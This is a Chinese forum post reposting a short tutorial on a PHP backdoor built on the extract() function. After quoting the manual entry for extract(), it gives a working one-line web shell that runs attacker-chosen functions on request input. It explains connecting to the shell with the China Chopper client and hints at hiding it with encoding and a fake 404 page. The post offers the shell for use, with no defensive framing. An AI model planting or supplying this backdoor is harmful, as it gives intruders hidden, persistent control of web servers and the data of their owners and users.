云美公社»首页 IT技术/使用交流 电脑病毒论坛 ODOR1–PHP extract 后门使用方法
返回列表 發新帖
查看: 56|回覆: 0

[服务器安全] ODOR1–PHP extract 后门使用方法

[複製鏈接]
我的心为你而笑

4

主題

0

回帖

0

積分

热心网友

金币
0
閲讀權限
220
精華
0
威望
0
贡献
0
在線時間
0 小時
註冊時間
2009-1-2
發表於 2016-8-22 21:02:24 | 顯示全部樓層 |閲讀模式
PHP extract 函数后门
Auth:winger[L4F][CGH]
Date: 2014-02-24
今天介绍的是一种新的PHP后门: extract 函数后门.


复制代码
代码如下:

extract
(PHP 4, PHP 5)
extract — 从数组中将变量导入到当前的符号表
int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )
本函数用来将变量从数组中导入到当前的符号表中.


具体应用:

1: PHP中extract函数各种用法介绍
2: PHP extract() 函数
3: 官方文档
4: php-backdoors-hidden-with-clever-use-of-extract-function
接下来操刀上马
服务端代码:

复制代码
代码如下:

<?@extract($_REQUEST);@die($err($info));?>




菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容:



最后加上各种编码,标签和404....你懂得( ‵▽′)ψ
回覆

使用道具 舉報

返回列表 發新帖
高級模式
B Color Image Link Quote Code Smilies
您需要登錄後才可以回帖 登錄 | 立即注册

本版積分規則

Archiver|手机版|小黑屋|云美公社 |nimba_sitemap:appname

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部